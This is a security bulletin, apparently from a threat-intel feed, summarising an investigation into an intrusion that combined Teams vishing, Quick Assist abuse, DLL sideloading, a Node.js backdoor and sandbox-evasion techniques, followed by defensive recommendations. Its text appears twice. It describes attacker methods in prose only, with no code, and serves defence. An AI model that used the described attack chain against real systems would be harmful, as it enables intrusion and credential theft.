New Phishing Attack Combines Vishing and DLL Sideloading Techniques
Summary:
Ontinue’s Cyber Defence Centre investigated a complex, multi-stage attack involving social engineering, remote support abuse, and stealthy post-exploitation techniques. The intrusion began with a vishing campaign where the threat actor impersonated IT support and delivered a malicious PowerShell payload via Microsoft Teams chat. This payload facilitated the initial compromise and was followed by the abuse of Microsoft Quick Assist to gain remote access. Once inside, the attacker deployed a signed binary and sideloaded a malicious DLL, which reconnected to the attacker-controlled infrastructure. Persistence was achieved by placing a shortcut in the Startup folder, and the actor leveraged Background Intelligent Transfer Service jobs to stage additional payloads and maintain access over time. The second-stage payload included a JavaScript-based backdoor executed through a renamed Node.js binary, allowing for command-and-control via socket connections. The script used hardcoded credentials and connected to a C2 server, with an embedded password and a unique hardware ID for host tracking.
The adversary employed defense evasion through DLL sideloading, process hollowing, and termination of security-related processes. Discovery actions used WMI to gather system, network, and GPU details (potentially for VM detection). Lateral movement was attempted using PsExec, and credential theft was observed via access to browser-stored login data.
Security Officer Comments:
Notably, forensic analysis revealed advanced anti-analysis measures: debugger detection routines using IsDebuggerPresent, CPU feature checks, and sandbox evasion via vendor string and processor signature validation. Further stealth was achieved using inline hooking with custom hooking/unhooking logic resembling MinHook, enabling userland API redirection and memory unhooking to bypass endpoint defenses. Many of these tactics align with threat actor Storm-1811, previously identified by Microsoft, who is known for exploiting Microsoft Teams, Quick Assist, and signed binaries for initial access and persistence. Although attribution cannot be confirmed with high confidence, the TTP overlap is significant.
Suggested Corrections:
Key defensive measures include:
Link(s):
https://www.infosecurity-magazine.com/news/phishing-attack-combines-vishing/
Ontinue’s Cyber Defence Centre investigated a complex, multi-stage attack involving social engineering, remote support abuse, and stealthy post-exploitation techniques. The intrusion began with a vishing campaign where the threat actor impersonated IT support and delivered a malicious PowerShell payload via Microsoft Teams chat. This payload facilitated the initial compromise and was followed by the abuse of Microsoft Quick Assist to gain remote access. Once inside, the attacker deployed a signed binary and sideloaded a malicious DLL, which reconnected to the attacker-controlled infrastructure. Persistence was achieved by placing a shortcut in the Startup folder, and the actor leveraged Background Intelligent Transfer Service jobs to stage additional payloads and maintain access over time. The second-stage payload included a JavaScript-based backdoor executed through a renamed Node.js binary, allowing for command-and-control via socket connections. The script used hardcoded credentials and connected to a C2 server, with an embedded password and a unique hardware ID for host tracking.
The adversary employed defense evasion through DLL sideloading, process hollowing, and termination of security-related processes. Discovery actions used WMI to gather system, network, and GPU details (potentially for VM detection). Lateral movement was attempted using PsExec, and credential theft was observed via access to browser-stored login data.
Security Officer Comments:
Notably, forensic analysis revealed advanced anti-analysis measures: debugger detection routines using IsDebuggerPresent, CPU feature checks, and sandbox evasion via vendor string and processor signature validation. Further stealth was achieved using inline hooking with custom hooking/unhooking logic resembling MinHook, enabling userland API redirection and memory unhooking to bypass endpoint defenses. Many of these tactics align with threat actor Storm-1811, previously identified by Microsoft, who is known for exploiting Microsoft Teams, Quick Assist, and signed binaries for initial access and persistence. Although attribution cannot be confirmed with high confidence, the TTP overlap is significant.
Suggested Corrections:
Key defensive measures include:
- AI-powered tools for real-time environment visibility and alerting
- Monitoring messaging platforms for anomalous activities
- Securing remote access tools against unauthorized use
- Integrating machine-driven response systems for rapid mitigation
Link(s):
https://www.infosecurity-magazine.com/news/phishing-attack-combines-vishing/